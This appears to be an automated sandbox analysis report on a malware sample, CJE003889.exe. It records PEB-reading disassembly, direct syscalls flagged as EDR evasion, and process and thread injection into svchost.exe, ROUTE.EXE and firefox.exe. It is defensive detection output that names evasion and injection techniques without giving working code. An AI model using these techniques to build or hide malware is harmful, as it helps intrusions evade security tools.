Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5EB20 mov eax, dword ptr fs:[00000030h]	1_2_03B5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF8B28 mov eax, dword ptr fs:[00000030h]	1_2_03BF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF8B28 mov eax, dword ptr fs:[00000030h]	1_2_03BF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]	1_2_03C02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]	1_2_03C02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]	1_2_03C02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]	1_2_03C02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04B00 mov eax, dword ptr fs:[00000030h]	1_2_03C04B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2CB7E mov eax, dword ptr fs:[00000030h]	1_2_03B2CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B28B50 mov eax, dword ptr fs:[00000030h]	1_2_03B28B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDEB50 mov eax, dword ptr fs:[00000030h]	1_2_03BDEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE4B4B mov eax, dword ptr fs:[00000030h]	1_2_03BE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE4B4B mov eax, dword ptr fs:[00000030h]	1_2_03BE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC6B40 mov eax, dword ptr fs:[00000030h]	1_2_03BC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC6B40 mov eax, dword ptr fs:[00000030h]	1_2_03BC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFAB40 mov eax, dword ptr fs:[00000030h]	1_2_03BFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD8B42 mov eax, dword ptr fs:[00000030h]	1_2_03BD8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B38AA0 mov eax, dword ptr fs:[00000030h]	1_2_03B38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B38AA0 mov eax, dword ptr fs:[00000030h]	1_2_03B38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B86AA4 mov eax, dword ptr fs:[00000030h]	1_2_03B86AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B68A90 mov edx, dword ptr fs:[00000030h]	1_2_03B68A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04A80 mov eax, dword ptr fs:[00000030h]	1_2_03C04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6AAEE mov eax, dword ptr fs:[00000030h]	1_2_03B6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6AAEE mov eax, dword ptr fs:[00000030h]	1_2_03B6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30AD0 mov eax, dword ptr fs:[00000030h]	1_2_03B30AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B64AD0 mov eax, dword ptr fs:[00000030h]	1_2_03B64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B64AD0 mov eax, dword ptr fs:[00000030h]	1_2_03B64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]	1_2_03B86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]	1_2_03B86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]	1_2_03B86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B54A35 mov eax, dword ptr fs:[00000030h]	1_2_03B54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B54A35 mov eax, dword ptr fs:[00000030h]	1_2_03B54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6CA24 mov eax, dword ptr fs:[00000030h]	1_2_03B6CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5EA2E mov eax, dword ptr fs:[00000030h]	1_2_03B5EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBCA11 mov eax, dword ptr fs:[00000030h]	1_2_03BBCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BACA72 mov eax, dword ptr fs:[00000030h]	1_2_03BACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BACA72 mov eax, dword ptr fs:[00000030h]	1_2_03BACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]	1_2_03B6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]	1_2_03B6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]	1_2_03B6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDEA60 mov eax, dword ptr fs:[00000030h]	1_2_03BDEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]	1_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]	1_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]	1_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]	1_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]	1_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]	1_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]	1_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40A5B mov eax, dword ptr fs:[00000030h]	1_2_03B40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40A5B mov eax, dword ptr fs:[00000030h]	1_2_03B40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB89B3 mov esi, dword ptr fs:[00000030h]	1_2_03BB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB89B3 mov eax, dword ptr fs:[00000030h]	1_2_03BB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB89B3 mov eax, dword ptr fs:[00000030h]	1_2_03BB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B309AD mov eax, dword ptr fs:[00000030h]	1_2_03B309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B309AD mov eax, dword ptr fs:[00000030h]	1_2_03B309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B629F9 mov eax, dword ptr fs:[00000030h]	1_2_03B629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B629F9 mov eax, dword ptr fs:[00000030h]	1_2_03B629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]	1_2_03BBE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B649D0 mov eax, dword ptr fs:[00000030h]	1_2_03B649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]	1_2_03BFA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC69C0 mov eax, dword ptr fs:[00000030h]	1_2_03BC69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04940 mov eax, dword ptr fs:[00000030h]	1_2_03C04940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB892A mov eax, dword ptr fs:[00000030h]	1_2_03BB892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC892B mov eax, dword ptr fs:[00000030h]	1_2_03BC892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBC912 mov eax, dword ptr fs:[00000030h]	1_2_03BBC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B28918 mov eax, dword ptr fs:[00000030h]	1_2_03B28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B28918 mov eax, dword ptr fs:[00000030h]	1_2_03B28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE908 mov eax, dword ptr fs:[00000030h]	1_2_03BAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE908 mov eax, dword ptr fs:[00000030h]	1_2_03BAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD4978 mov eax, dword ptr fs:[00000030h]	1_2_03BD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD4978 mov eax, dword ptr fs:[00000030h]	1_2_03BD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBC97C mov eax, dword ptr fs:[00000030h]	1_2_03BBC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]	1_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]	1_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]	1_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B7096E mov eax, dword ptr fs:[00000030h]	1_2_03B7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B7096E mov edx, dword ptr fs:[00000030h]	1_2_03B7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B7096E mov eax, dword ptr fs:[00000030h]	1_2_03B7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB0946 mov eax, dword ptr fs:[00000030h]	1_2_03BB0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C008C0 mov eax, dword ptr fs:[00000030h]	1_2_03C008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBC89D mov eax, dword ptr fs:[00000030h]	1_2_03BBC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30887 mov eax, dword ptr fs:[00000030h]	1_2_03B30887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]	1_2_03B6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]	1_2_03B6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]	1_2_03BFA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]	1_2_03B5E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]	1_2_03B52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]	1_2_03B52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]	1_2_03B52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B52835 mov ecx, dword ptr fs:[00000030h]	1_2_03B52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]	1_2_03B52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]	1_2_03B52835

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00CB80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_00CB80A9

Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C8A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00C8A155
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C8A124 SetUnhandledExceptionFilter,		0_2_00C8A124

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\CJE003889.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\ROUTE.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: NULL target: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: NULL target: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\ROUTE.EXE

Thread register set: target process: 6404

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\ROUTE.EXE

Thread APC queued: target process: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\CJE003889.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 3081008

Jump to behavior

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00CB87B1 LogonUserW,

0_2_00CB87B1

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00C63B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00C63B3A

Source: C:\Users\user\Desktop\CJE003889.exe

